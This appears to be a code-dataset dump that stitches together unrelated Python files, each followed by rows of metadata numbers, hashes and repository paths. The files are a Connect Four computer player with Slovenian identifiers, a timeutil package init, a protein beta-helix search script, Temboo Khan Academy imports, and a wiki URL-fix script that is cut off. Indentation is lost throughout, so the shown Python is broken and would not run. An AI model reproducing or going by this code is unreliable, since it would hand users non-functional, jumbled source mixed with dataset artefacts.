for i in range(6):
for j in range(4):
if (self.polje[i][j] == "O" and self.polje[i][j + 1] == "O" and self.polje[i][j + 2] == "O" and self.polje[i][j + 3] == "X"):
stevilo += 1
if (self.polje[i][j] == "O" and self.polje[i][j + 1] == "O" and self.polje[i][j + 2] == "X" and self.polje[i][j + 3] == "O"):
stevilo += 1
if (self.polje[i][j] == "O" and self.polje[i][j + 1] == "X" and self.polje[i][j + 2] == "O" and self.polje[i][j + 3] == "O"):
stevilo += 1
if (self.polje[i][j] == "X" and self.polje[i][j + 1] == "O" and self.polje[i][j + 2] == "O" and self.polje[i][j + 3] == "O"):
stevilo += 1
return stevilo
def blokada_zmage_posevno_O(self):
stevilo = 0
for i in range(3):
for j in range(4):
if (self.polje[i][j] == "X" and self.polje[i + 1][j + 1] == "O" and self.polje[i + 2][j + 2] == "O" and self.polje[i + 3][j + 3] == "O"):
stevilo += 1
if (self.polje[i][j] == "O" and self.polje[i + 1][j + 1] == "X" and self.polje[i + 2][j + 2] == "O" and self.polje[i + 3][j + 3] == "O"):
stevilo += 1
if (self.polje[i][j] == "O" and self.polje[i + 1][j + 1] == "O" and self.polje[i + 2][j + 2] == "X" and self.polje[i + 3][j + 3] == "O"):
stevilo += 1
if (self.polje[i][j] == "O" and self.polje[i + 1][j + 1] == "O" and self.polje[i + 2][j + 2] == "O" and self.polje[i + 3][j + 3] == "X"):
stevilo += 1
return stevilo
def blokada_zmaga_posevno2_O(self):
stevilo = 0
for i in range(3, 5):
for j in range(4):
if (self.polje[i][j] == "X" and self.polje[i - 1][j + 1] == "O" and self.polje[i - 2][j + 2] == "O" and self.polje[i - 3][j + 3] == "O"):
stevilo += 1
if (self.polje[i][j] == "O" and self.polje[i - 1][j + 1] == "X" and self.polje[i - 2][j + 2] == "O" and self.polje[i - 3][j + 3] == "O"):
stevilo += 1
if (self.polje[i][j] == "O" and self.polje[i - 1][j + 1] == "O" and self.polje[i - 2][j + 2] == "X" and self.polje[i - 3][j + 3] == "O"):
stevilo += 1
if (self.polje[i][j] == "O" and self.polje[i - 1][j + 1] == "O" and self.polje[i - 2][j + 2] == "O" and self.polje[i - 3][j + 3] == "X"):
stevilo += 1
return stevilo
######################################################################################################################################################################
def blokada_vodoravno_3(self):
stevilo = 0
for i in range(6):
for j in range(5):
if self.polje[i][j] == "X" and self.polje[i][j + 1] == "X" and self.polje[i][j + 2] == "O":
stevilo += 1
if self.polje[i][j] == "O" and self.polje[i][j + 1] == "X" and self.polje[i][j + 2] == "X":
stevilo += 1
if self.polje[i][j] == "X" and self.polje[i][j + 1] == "O" and self.polje[i][j + 2] == "X":
stevilo += 1
return stevilo
def blokada_navpicno_3(self):
stevilo = 0
for i in range(4):
for j in range(7):
if self.polje[i][j] == "X" and self.polje[i + 1][j] == "X" and self.polje[i + 2][j] == "O":
stevilo += 1
if self.polje[i][j] == "O" and self.polje[i + 1][j] == "X" and self.polje[i + 2][j] == "X":
stevilo += 1
if self.polje[i][j] == "X" and self.polje[i + 1][j] == "O" and self.polje[i + 2][j] == "X":
stevilo += 1
return stevilo
def blokada_posevno_3(self):
stevilo = 0
for i in range(4):
for j in range(5):
if self.polje[i][j] == "X" and self.polje[i + 1][j + 1] == "X" and self.polje[i + 2][j + 2] == "O":
stevilo += 1
if self.polje[i][j] == "O" and self.polje[i + 1][j + 1] == "X" and self.polje[i + 2][j + 2] == "X":
stevilo += 1
if self.polje[i][j] == "X" and self.polje[i + 1][j + 1] == "O" and self.polje[i + 2][j + 2] == "X":
stevilo += 1
return stevilo
def blokada_posevno2_3(self):
stevilo = 0
for i in range(2, 5):
for j in range(5):
if self.polje[i][j] == "X" and self.polje[i - 1][j + 1] == "X" and self.polje[i - 2][j + 2] == "O":
stevilo += 1
if self.polje[i][j] == "O" and self.polje[i - 1][j + 1] == "X" and self.polje[i - 2][j + 2] == "X":
stevilo += 1
if self.polje[i][j] == "X" and self.polje[i - 1][j + 1] == "O" and self.polje[i - 2][j + 2] == "X":
stevilo += 1
return stevilo
######################################################################################################################################################################
def blokada_vodoravno_2(self):
stevilo = 0
for i in range(6):
for j in range(5):
if self.polje[i][j] == "X" and self.polje[i][j + 1] == "O":
stevilo += 1
if self.polje[i][j] == "O" and self.polje[i][j + 1] == "X":
stevilo += 1
return stevilo
def blokada_navpicno_2(self):
stevilo = 0
for i in range(5):
for j in range(7):
if self.polje[i][j] == "X" and self.polje[i + 1][j] == "O":
stevilo += 1
if self.polje[i][j] == "O" and self.polje[i + 1][j] == "X":
stevilo += 1
return stevilo
def blokada_posevno_2(self):
stevilo = 0
for i in range(5):
for j in range(6):
if self.polje[i][j] == "X" and self.polje[i + 1][j + 1] == "O":
stevilo += 1
if self.polje[i][j] == "O" and self.polje[i + 1][j + 1] == "X":
stevilo += 1
return stevilo
def blokada_posevno2_2(self):
stevilo = 0
for i in range(1, 5):
for j in range(6):
if self.polje[i][j] == "X" and self.polje[i - 1][j + 1] == "O":
stevilo += 1
if self.polje[i][j] == "O" and self.polje[i - 1][j + 1] == "X":
stevilo += 1
return stevilo
######################################################################################################################################################################
def blokada_nase_zmage_vodoravno(self):
stevilo = 0
for i in range(6):
for j in range(4):
if (self.polje[i][j] == "O" and self.polje[i][j + 1] == "O" and self.polje[i][j + 2] == "O" and self.polje[i][j + 3] == "X"):
stevilo += 1
if (self.polje[i][j] == "O" and self.polje[i][j + 1] == "O" and self.polje[i][j + 2] == "X" and self.polje[i][j + 3] == "O"):
stevilo += 1
if (self.polje[i][j] == "O" and self.polje[i][j + 1] == "X" and self.polje[i][j + 2] == "O" and self.polje[i][j + 3] == "O"):
stevilo += 1
if (self.polje[i][j] == "X" and self.polje[i][j + 1] == "O" and self.polje[i][j + 2] == "O" and self.polje[i][j + 3] == "O"):
stevilo += 1
return stevilo
def blokada_nase_zmage_navpicno(self):
stevilo = 0
for i in range(3):
for j in range(7):
if (self.polje[i][j] == "X" and self.polje[i + 1][j] == "O" and self.polje[i + 2][j] == "O" and self.polje[i + 3][j] == "O"):
stevilo += 1
if (self.polje[i][j] == "O" and self.polje[i + 1][j] == "X" and self.polje[i + 2][j] == "O" and self.polje[i + 3][j] == "O"):
stevilo += 1
if (self.polje[i][j] == "O" and self.polje[i + 1][j] == "O" and self.polje[i + 2][j] == "X" and self.polje[i + 3][j] == "O"):
stevilo += 1
if ( self.polje[i][j] == "O" and self.polje[i + 1][j] == "O" and self.polje[i + 2][j] == "O" and self.polje[i + 3][j] == "X"):
stevilo += 1
return stevilo
def blokada_nase_zmage_posevno(self):
stevilo = 0
for i in range(3):
for j in range(4):
if (self.polje[i][j] == "X" and self.polje[i + 1][j + 1] == "O" and self.polje[i + 2][j + 2] == "O" and self.polje[i + 3][j + 3] == "O"):
stevilo += 1
if (self.polje[i][j] == "O" and self.polje[i + 1][j + 1] == "X" and self.polje[i + 2][j + 2] == "O" and self.polje[i + 3][j + 3] == "O"):
stevilo += 1
if (self.polje[i][j] == "O" and self.polje[i + 1][j + 1] == "O" and self.polje[i + 2][j + 2] == "X" and self.polje[i + 3][j + 3] == "O"):
stevilo += 1
if (self.polje[i][j] == "O" and self.polje[i + 1][j + 1] == "O" and self.polje[i + 2][j + 2] == "O" and self.polje[i + 3][j + 3] == "X"):
stevilo += 1
return stevilo
def blokada_nase_zmage_posevno2(self):
stevilo = 0
for i in range(3, 5):
for j in range(4):
if (self.polje[i][j] == "X" and self.polje[i - 1][j + 1] == "O" and self.polje[i - 2][j + 2] == "O" and self.polje[i - 3][j + 3] == "O"):
stevilo += 1
if (self.polje[i][j] == "O" and self.polje[i - 1][j + 1] == "X" and self.polje[i - 2][j + 2] == "O" and self.polje[i - 3][j + 3] == "O"):
stevilo += 1
if (self.polje[i][j] == "O" and self.polje[i - 1][j + 1] == "O" and self.polje[i - 2][j + 2] == "X" and self.polje[i - 3][j + 3] == "O"):
stevilo += 1
if (self.polje[i][j] == "O" and self.polje[i - 1][j + 1] == "O" and self.polje[i - 2][j + 2] == "O" and self.polje[i - 3][j + 3] == "X"):
stevilo += 1
return stevilo
######################################################################################################################################################################
def zmaga_vodoravno_presledek(self):
stevilo = 0
for i in range(6):
for j in range(4):
if (self.polje[i][j] == "O" and self.polje[i][j + 1] == "O" and self.polje[i][j + 2] == "O" and self.polje[i][j + 3] == " "):
stevilo += 1
if (self.polje[i][j] == "O" and self.polje[i][j + 1] == "O" and self.polje[i][j + 2] == " " and self.polje[i][j + 3] == "O"):
stevilo += 1
if (self.polje[i][j] == "O" and self.polje[i][j + 1] == " " and self.polje[i][j + 2] == "O" and self.polje[i][j + 3] == "O"):
stevilo += 1
if (self.polje[i][j] == " " and self.polje[i][j + 1] == "O" and self.polje[i][j + 2] == "O" and self.polje[i][j + 3] == "O"):
stevilo += 1
return stevilo
def zmaga_posevno_presledek(self):
stevilo = 0
for i in range(3):
for j in range(4):
if (self.polje[i][j] == " " and self.polje[i + 1][j + 1] == "O" and self.polje[i + 2][j + 2] == "O" and self.polje[i + 3][j + 3] == "O"):
stevilo += 1
if (self.polje[i][j] == "O" and self.polje[i + 1][j + 1] == " " and self.polje[i + 2][j + 2] == "O" and self.polje[i + 3][j + 3] == "O"):
stevilo += 1
if (self.polje[i][j] == "O" and self.polje[i + 1][j + 1] == "O" and self.polje[i + 2][j + 2] == " " and self.polje[i + 3][j + 3] == "O"):
stevilo += 1
if (self.polje[i][j] == "O" and self.polje[i + 1][j + 1] == "O" and self.polje[i + 2][j + 2] == "O" and self.polje[i + 3][j + 3] == " "):
stevilo += 1
return stevilo
def zmaga_posevno2_presledek(self):
stevilo = 0
for i in range(3, 5):
for j in range(4):
if (self.polje[i][j] == " " and self.polje[i - 1][j + 1] == "O" and self.polje[i - 2][j + 2] == "O" and self.polje[i - 3][j + 3] == "O"):
stevilo += 1
if (self.polje[i][j] == "O" and self.polje[i - 1][j + 1] == " " and self.polje[i - 2][j + 2] == "O" and self.polje[i - 3][j + 3] == "O"):
stevilo += 1
if (self.polje[i][j] == "O" and self.polje[i - 1][j + 1] == "O" and self.polje[i - 2][j + 2] == " " and self.polje[i - 3][j + 3] == "O"):
stevilo += 1
if (self.polje[i][j] == "O" and self.polje[i - 1][j + 1] == "O" and self.polje[i - 2][j + 2] == "O" and self.polje[i - 3][j + 3] == " "):
stevilo += 1
return stevilo
######################################################################################################################################################################
def izbira_poteze_robot(self):
slovar = {}
dobre_poteze = []
seznam = []
for izbira in self.seznam_pravilnih():
slovar[izbira] = 0
for izbira in self.seznam_pravilnih():
if izbira == 2 or izbira == 3 or izbira == 4:
slovar[izbira] = slovar[izbira] + 150
for izbira in self.seznam_pravilnih():
if self.get_visina(izbira) == 1 or self.get_visina(izbira) == 2 or self.get_visina(izbira) == 3:
slovar[izbira] = slovar[izbira] + 150
# preveri zmago
for izbira in self.seznam_pravilnih():
self.dodaj_kovanec_O(izbira)
if self.zmaga() == True:
slovar[izbira] = slovar[izbira] + 100000000000000000000000000000000000000
self.odstrani_kovanec(izbira)
# gradi svoje trojke
for izbira in self.seznam_pravilnih():
self.dodaj_kovanec_O(izbira)
slovar[izbira] = slovar[izbira] + (self.vodoravno_3() + self.navpicno_3() + self.posevno_3() + self.posevno2_3()) * 2700
self.odstrani_kovanec(izbira)
# dela svoje dvojice
for izbira in self.seznam_pravilnih():
self.dodaj_kovanec_O(izbira)
slovar[izbira] = slovar[izbira] + (self.vodoravno_2_0() + self.navpicno_2_0() + self.posevno_2_0() + self.posevno2_2_0())*300
self.odstrani_kovanec(izbira)
# ce po dodattku kovanca nasprotnik zmaga to prepreci
for izbira in self.seznam_pravilnih():
self.dodaj_kovanec_O(izbira)
if self.get_visina(izbira) != 6:
self.dodaj_kovanec_X(izbira)
if self.zmaga() == True:
slovar[izbira] = slovar[izbira] - 10000000000000000000000
self.odstrani_kovanec(izbira)
self.odstrani_kovanec(izbira)
# ce mu po metu kovanca, nasprotnik unici 4ko, to prepreci
for izbira in self.seznam_pravilnih():
self.dodaj_kovanec_O(izbira)
k = self.blokada_zmage_vodoravno_O() + self.blokada_zmage_posevno_O() + self.blokada_zmaga_posevno2_O()
if self.get_visina(izbira) != 6:
self.dodaj_kovanec_X(izbira)
l = self.blokada_zmage_vodoravno_O() + self.blokada_zmage_posevno_O() + self.blokada_zmaga_posevno2_O()
if k < l:
slovar[izbira] = slovar[izbira] - 100000000
self.odstrani_kovanec(izbira)
self.odstrani_kovanec(izbira)
# ce lahko prepreci zmago nasprotnika jo prepreci
for izbira in self.seznam_pravilnih():
self.dodaj_kovanec_O(izbira)
slovar[izbira] = slovar[izbira] + (self.blokada_zmage_vodoravno() + self.blokada_zmage_navpicno() + self.blokada_zmage_posevno() + self.blokada_zmaga_posevno2())*10000000000000000000000000000
self.odstrani_kovanec(izbira)
# prisiljeno zmago naredi
for izbira in self.seznam_pravilnih():
self.dodaj_kovanec_O(izbira)
k = self.blokada_zmage_vodoravno_O() + self.blokada_zmage_posevno_O() + self.blokada_zmaga_posevno2_O()
if self.get_visina(izbira) < 5:
self.dodaj_kovanec_X(izbira)
l = self.blokada_zmage_vodoravno_O() + self.blokada_zmage_posevno_O() + self.blokada_zmaga_posevno2_O()
if k < l:
self.dodaj_kovanec_O(izbira)
if self.zmaga_0() == True:
slovar[izbira] = slovar[izbira] + 100000000000000000
self.odstrani_kovanec(izbira)
self.odstrani_kovanec(izbira)
self.odstrani_kovanec(izbira)
# blokira nasprotnikove trojke
for izbira in self.seznam_pravilnih():
self.dodaj_kovanec_O(izbira)
slovar[izbira] = slovar[izbira] + (self.blokada_vodoravno_3() + self.blokada_navpicno_3() + self.blokada_posevno_3() + self.blokada_posevno2_3())*1000
self.odstrani_kovanec(izbira)
# trojice s presledkom
for izbira in self.seznam_pravilnih():
self.dodaj_kovanec_O(izbira)
slovar[izbira] = slovar[izbira] + (self.zmaga_vodoravno_presledek() + self.zmaga_posevno_presledek() + self.zmaga_posevno2_presledek()) * 2000
self.odstrani_kovanec(izbira)
#ne vrze trojke na vrh
for izbira in self.seznam_pravilnih():
k = self.navpicno_3()
self.dodaj_kovanec_O(izbira)
if self.get_visina(izbira) == 6:
l = self.navpicno_3()
if k < l:
slovar[izbira] = slovar[izbira] - 2000
self.odstrani_kovanec(izbira)
# ne mece v kot ce je troijca
for izbira in self.seznam_pravilnih():
k = self.vodoravno_3() + self.posevno_3() + self.posevno2_3()
self.dodaj_kovanec_O(izbira)
if izbira == 0 or izbira == 6:
l = self.vodoravno_3() + self.posevno_3() + self.posevno2_3()
if k < l:
slovar[izbira] = slovar[izbira] - 2000
self.odstrani_kovanec(izbira)
# ce sta po dodatku kovanca dve razlicni zmagi, to naredi
for izbira in self.seznam_pravilnih():
self.dodaj_kovanec_O(izbira)
stevilo_zmag = 0
for i in self.seznam_pravilnih():
self.dodaj_kovanec_O(i)
stevilo_zmag += self.st_zmag()
self.odstrani_kovanec(i)
if stevilo_zmag >= 2:
slovar[izbira] = slovar[izbira] + 10000000000000000
self.odstrani_kovanec(izbira)
#blokira potezo ki naredi dva poraza
for izbira in self.seznam_pravilnih():
self.dodaj_kovanec_X(izbira)
stevilo_porazov = 0
for i in self.seznam_pravilnih():
self.dodaj_kovanec_X(i)
stevilo_porazov += self.st_zmag()
self.odstrani_kovanec(i)
if stevilo_porazov >= 2:
slovar[izbira] = slovar[izbira] + 100000000000000
self.odstrani_kovanec(izbira)
for n in self.seznam_pravilnih():
seznam.append(slovar[n])
if seznam == []:
return None
else:
m = max(seznam)
for j in self.seznam_pravilnih():
if slovar[j] == m:
dobre_poteze.append(j)
k = random.randint(0, len(dobre_poteze) - 1)
if self.seznam_pravilnih() == []:
return None
else:
return dobre_poteze[k]
def izbira_poteze_robot_easy(self):
izbira = random.randint(0, 6)
return izbira
def zeton_na_mestu(self, vrstica, stolpec):
return self.polje[vrstica][stolpec]
| 47.895105
| 291
| 0.421789
| 5,605
| 41,094
| 3.027297
| 0.028189
| 0.24558
| 0.265794
| 0.22678
| 0.84954
| 0.813119
| 0.790429
| 0.773574
| 0.753124
| 0.707921
| 0
| 0.042529
| 0.372317
| 41,094
| 858
| 292
| 47.895105
| 0.614872
| 0.010269
| 0
| 0.615172
| 0
| 0
| 0.016958
| 0.001527
| 0
| 0
| 0
| 0
| 0
| 1
| 0.09931
| false
| 0
| 0.002759
| 0.001379
| 0.211034
| 0.005517
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
84bd579e8291220e1c2e68e475708df307230d0e
| 511
|
py
|
Python
|
timeutil/__init__.py
|
wenbobuaa/pykit
|
43e38fe40297a1e7a9329bcf3db3554c7ca48ead
|
[
"MIT"
] | null | null | null |
timeutil/__init__.py
|
wenbobuaa/pykit
|
43e38fe40297a1e7a9329bcf3db3554c7ca48ead
|
[
"MIT"
] | null | null | null |
timeutil/__init__.py
|
wenbobuaa/pykit
|
43e38fe40297a1e7a9329bcf3db3554c7ca48ead
|
[
"MIT"
] | null | null | null |
from .timeutil import (
formats,
parse,
format,
format_ts,
utc_datetime_to_ts,
datetime_to_ts,
ts_to_datetime,
ts,
ms,
us,
ns,
ms_to_ts,
us_to_ts,
ns_to_ts,
to_sec,
is_timestamp,
)
__all__ = [
'formats',
'parse',
'format',
'format_ts',
'utc_datetime_to_ts',
'datetime_to_ts',
'ts_to_datetime',
'ts',
'ms',
'us',
'ns',
'ms_to_ts',
'us_to_ts',
'ns_to_ts',
'to_sec',
'is_timestamp',
]
| 13.447368
| 25
| 0.530333
| 68
| 511
| 3.455882
| 0.25
| 0.170213
| 0.204255
| 0.204255
| 0.910638
| 0.910638
| 0.910638
| 0.910638
| 0.910638
| 0.910638
| 0
| 0
| 0.332681
| 511
| 37
| 26
| 13.810811
| 0.68915
| 0
| 0
| 0
| 0
| 0
| 0.240705
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.027778
| 0
| 0.027778
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
84c966d96e3612c4e562eab54b33ceccedf6292f
| 7,055
|
py
|
Python
|
LHBproteinSearch.py
|
youdar/Threading-LHBH
|
4edb2c1ead98e02a65e49342a5f699fa35cb260b
|
[
"MIT"
] | null | null | null |
LHBproteinSearch.py
|
youdar/Threading-LHBH
|
4edb2c1ead98e02a65e49342a5f699fa35cb260b
|
[
"MIT"
] | null | null | null |
LHBproteinSearch.py
|
youdar/Threading-LHBH
|
4edb2c1ead98e02a65e49342a5f699fa35cb260b
|
[
"MIT"
] | null | null | null |
'''
LHBproteinSearch.py is a program that contains search functions that
search a pdb file for regions of possible left-hand-beta-helix structure
'''
# Import modules
import numpy as nm
import string as st
import pylab as pl
import copy as cp
import time
from TheaderCommonFunctions import *
from ReadDate import *
from ThreadClasses import *
from AminoData import *
def SearchLHB18(pbdFileName,shortl=1,longl=2,pseq_length=42,minLoopDis=16):
'''
This function scans a pdb file for possible LHB-18 regions
It outputs a list where all LHB marked by 1 and other structures marked by 0
It output the list of amino acids in the LHB regions and the possible threads
pbdFileName : the name of the pdb file
shortl=1,longl=2,minLoopDis=16 : default parameters for scoring
pseq_length is length of the of sub sequence on which we run the scoring algorithm
'''
start_time = time.clock()
print 'Searching for possible LHB18 structure' # Making sure we running LHB-18 search
# General amino acid data, tables
#AAlist = AminoList()
#aminotable = AminoTable()
# Structure rule file name and location
s_file_name = 'StructureFile-LeftBetaH-18.txt'
s_file_path = 'C://Users//youval//Documents//Education//work biophy//Structure and scoring rules//'
Structure_rules = read_structure_rules(s_file_name, s_file_path)
# init
BaseData = BaseInputData(Structure_rules)
BaseData.shortl = shortl
BaseData.longl = longl
BaseData.maxLoopFlag = minLoopDis
# Scoring parameters
ScoresP = ScoreParameters()
# reading protein sequence
#pbdFileName += '.pdb'
#file_path = 'C://Users//youval//Documents//Education//work biophy//Protein seq//pdb files//'
#file_path = 'C://Users//youval//Documents//Education//work biophy//Protein seq//Diseas related proteins//p53//'
file_path = 'C://Users//youval//Documents//Education//work biophy//Protein seq//test//'
file_name = 'testLBH'
seq = read_seq_file(file_name, file_path) # Get amino acid sequence
#seq = Get_pdb_seq_info(file_name, file_path) # Get amino acid from pdb file
seq = seq.upper()
# parce the sequence
side_length = 6 # side length in the LHB structure model
n_iter = (len(seq)- pseq_length)/side_length + 1 # number of iterations
scores_array = nm.zeros(n_iter) # Array for results collection
x = nm.array(range(n_iter))
for i in x:
ii = i * side_length
p_seq = seq[ii:(ii+pseq_length)] # sending two turns for scoring
score = get_seq_score(Structure_rules,p_seq,BaseData,ScoresP)
scores_array[i] = score # Collect the scores
# Calculation time
dtime = (time.clock() - start_time)/60
print 'Calculation time is %.1f min' % dtime
# Evaluating LHB regions
x2 = nm.array([])
for i in scores_array:
if i>70:x2 = nm.append(x2,100)
else:x2 = nm.append(x2,10)
# Plotting
x *= side_length # addjusting the valuse of x to represent amino acid number
TitleString = 'Scores for %s - steps of %i amino acids' % (pbdFileName,side_length)
xLabelStr = 'Position - amino acid start + %i, loops (%i : %i) ' % (pseq_length,shortl,longl)
yLabelStr = 'Scores'
#pl.subplot(311)
pl.figure(1)
pl.title(TitleString)
pl.xlabel(xLabelStr)
pl.ylabel(yLabelStr)
pl.plot(x,scores_array,'r--o') # r fro red, --o both dash line and dots
pl.ylim((0,120))
pl.xlim((0,(len(seq)+10)))
#pl.figure(2)
#pl.subplot(313)
#TitleString = 'Estimated possible LBH regions'
#pl.title(TitleString)
#pl.xlabel(xLabelStr)
#pl.plot(x,x2,'b')
#pl.ylim((0,120))
#pl.xlim((0,(len(seq)+10)))
pl.show()
def SearchLHB15(pbdFileName,shortl=1,longl=2,pseq_length=42,minLoopDis=16):
'''
This function scans a pdb file for possible LHB-18 regions
It outputs a list where all LHB marked by 1 and other structures marked by 0
It output the list of amino acids in the LHB regions and the possible threads
pbdFileName : the name of the pdb file
shortl=1,longl=2,minLoopDis=16 : default parameters for scoring
pseq_length is length of the of sub sequence on which we run the scoring algorithm
'''
start_time = time.clock()
print 'Searching for possible LHB15 structure' # Making sure we running LHB-15 search
# Structure rule file name and location
s_file_name = 'StructureFile-LeftBetaH-15.txt'
s_file_path = 'C://Users//youval//Documents//Education//work biophy//Structure and scoring rules//'
Structure_rules = read_structure_rules(s_file_name, s_file_path)
# init
BaseData = BaseInputData(Structure_rules)
BaseData.shortl = shortl
BaseData.longl = longl
BaseData.maxLoopFlag = minLoopDis
# Scoring parameters
ScoresP = ScoreParameters()
# reading protein sequence
#pbdFileName += '.pdb'
#file_path = 'C://Users//youval//Documents//Education//work biophy//Protein seq//pdb files//'
#file_path = 'C://Users//youval//Documents//Education//work biophy//Protein seq//Diseas related proteins//p53//'
file_path = 'C://Users//youval//Documents//Education//work biophy//Protein seq//test//'
file_name = 'testLBH'
seq = read_seq_file(file_name, file_path) # Get amino acid sequence
#seq = Get_pdb_seq_info(pbdFileName, file_path) # Get amino acid from pdb file
seq = seq.upper()
# parce the sequence
side_length = 5 # side length in the LHB structure model
n_iter = (len(seq)- pseq_length)/side_length + 1 # number of iterations
scores_array = nm.zeros(n_iter) # Array for results collection
x = nm.array(range(n_iter))
for i in x:
ii = i * side_length
p_seq = seq[ii:(ii+pseq_length)] # sending two turns for scoring
score = get_seq_score(Structure_rules,p_seq,BaseData,ScoresP)
scores_array[i] = score # Collect the scores
# Calculation time
dtime = (time.clock() - start_time)/60
print 'Calculation time is %.1f min' % dtime
# Evaluating LHB regions
x2 = nm.array([])
for i in scores_array:
if i>70:x2 = nm.append(x2,100)
else:x2 = nm.append(x2,10)
# Plotting
x *= side_length # addjusting the valuse of x to represent amino acid number
TitleString = 'Scores for %s - steps of %i amino acids' % (pbdFileName,side_length)
xLabelStr = 'Position - amino acid start + %i, loops (%i : %i) ' % (pseq_length,shortl,longl)
yLabelStr = 'Scores'
#pl.subplot(311)
pl.figure(1)
pl.title(TitleString)
pl.xlabel(xLabelStr)
pl.ylabel(yLabelStr)
pl.plot(x,scores_array,'r--o') # r fro red, --o both dash line and dots
pl.ylim((0,90))
pl.xlim((0,(len(seq)+10)))
#pl.figure(2)
#pl.subplot(313)
#TitleString = 'Estimated possible LBH regions'
#pl.title(TitleString)
#pl.xlabel(xLabelStr)
#pl.plot(x,x2,'b')
#pl.ylim((0,120))
#pl.xlim((0,(len(seq)+10)))
pl.show()
SearchLHB18('Prion',1,2,7*6,17)
#SearchLHB15('Prion',1,2,12*5,14)
| 39.858757
| 116
| 0.678526
| 1,021
| 7,055
| 4.593536
| 0.208619
| 0.023881
| 0.015352
| 0.023881
| 0.899147
| 0.899147
| 0.885928
| 0.884222
| 0.884222
| 0.884222
| 0
| 0.025811
| 0.209213
| 7,055
| 176
| 117
| 40.085227
| 0.814841
| 0.283345
| 0
| 0.787234
| 0
| 0
| 0.181749
| 0.060499
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.095745
| null | null | 0.042553
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
84de2d1fca524d475ae6a23c5731b49e2379a0ce
| 1,243
|
py
|
Python
|
temboo/core/Library/KhanAcademy/Users/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 7
|
2016-03-07T02:07:21.000Z
|
2022-01-21T02:22:41.000Z
|
temboo/core/Library/KhanAcademy/Users/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | null | null | null |
temboo/core/Library/KhanAcademy/Users/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 8
|
2016-06-14T06:01:11.000Z
|
2020-04-22T09:21:44.000Z
|
from temboo.Library.KhanAcademy.Users.CurrentUser import CurrentUser, CurrentUserInputSet, CurrentUserResultSet, CurrentUserChoreographyExecution
from temboo.Library.KhanAcademy.Users.GetExercise import GetExercise, GetExerciseInputSet, GetExerciseResultSet, GetExerciseChoreographyExecution
from temboo.Library.KhanAcademy.Users.GetExerciseFollowUp import GetExerciseFollowUp, GetExerciseFollowUpInputSet, GetExerciseFollowUpResultSet, GetExerciseFollowUpChoreographyExecution
from temboo.Library.KhanAcademy.Users.GetExerciseLog import GetExerciseLog, GetExerciseLogInputSet, GetExerciseLogResultSet, GetExerciseLogChoreographyExecution
from temboo.Library.KhanAcademy.Users.GetUserExercises import GetUserExercises, GetUserExercisesInputSet, GetUserExercisesResultSet, GetUserExercisesChoreographyExecution
from temboo.Library.KhanAcademy.Users.GetUserVideos import GetUserVideos, GetUserVideosInputSet, GetUserVideosResultSet, GetUserVideosChoreographyExecution
from temboo.Library.KhanAcademy.Users.GetVideo import GetVideo, GetVideoInputSet, GetVideoResultSet, GetVideoChoreographyExecution
from temboo.Library.KhanAcademy.Users.GetVideoLog import GetVideoLog, GetVideoLogInputSet, GetVideoLogResultSet, GetVideoLogChoreographyExecution
| 138.111111
| 185
| 0.909895
| 88
| 1,243
| 12.852273
| 0.431818
| 0.070734
| 0.120248
| 0.198055
| 0.233422
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.045052
| 1,243
| 8
| 186
| 155.375
| 0.952822
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
84e825ded4cea25baefeda368c7bc479ac1ed7a9
| 10,949
|
py
|
Python
|
wiki_url_fix.py
|
matsujirushi/wiki-documents
|
2e7b72667788c6c22c0768853fb48683027b3a9f
|
[
"MIT"
] | 10
|
2020-11-17T00:23:44.000Z
|
2021-11-21T10:11:52.000Z
|
wiki_url_fix.py
|
matsujirushi/wiki-documents
|
2e7b72667788c6c22c0768853fb48683027b3a9f
|
[
"MIT"
] | 7
|
2020-11-21T01:36:52.000Z
|
2021-08-13T04:47:03.000Z
|
wiki_url_fix.py
|
matsujirushi/wiki-documents
|
2e7b72667788c6c22c0768853fb48683027b3a9f
|
[
"MIT"
] | 12
|
2020-11-20T16:22:11.000Z
|
2022-01-10T16:39:38.000Z
|
import os
#import requests
#https://github.com/SeeedDocument/wiki_english/raw/master/docs/images/300px-Get_One_Now_Banner-ragular.png
def main():
url = 0
docs_md = os.listdir("docs") #列出docs文件夹下面的所有文件
fin = []
for doc_md in docs_md:
if doc_md[-3:] == ".md": #如果文件格式为.md
doc = open("docs/" + doc_md, mode = "rt",encoding='UTF-8')
try:
for line in doc:
if line.find("https://github.com/SeeedDocument") != -1: #如果找到该字符串了
url = line[line.find("https://github.com/SeeedDocument")+33:] #跳转到搜索字符的最后一位
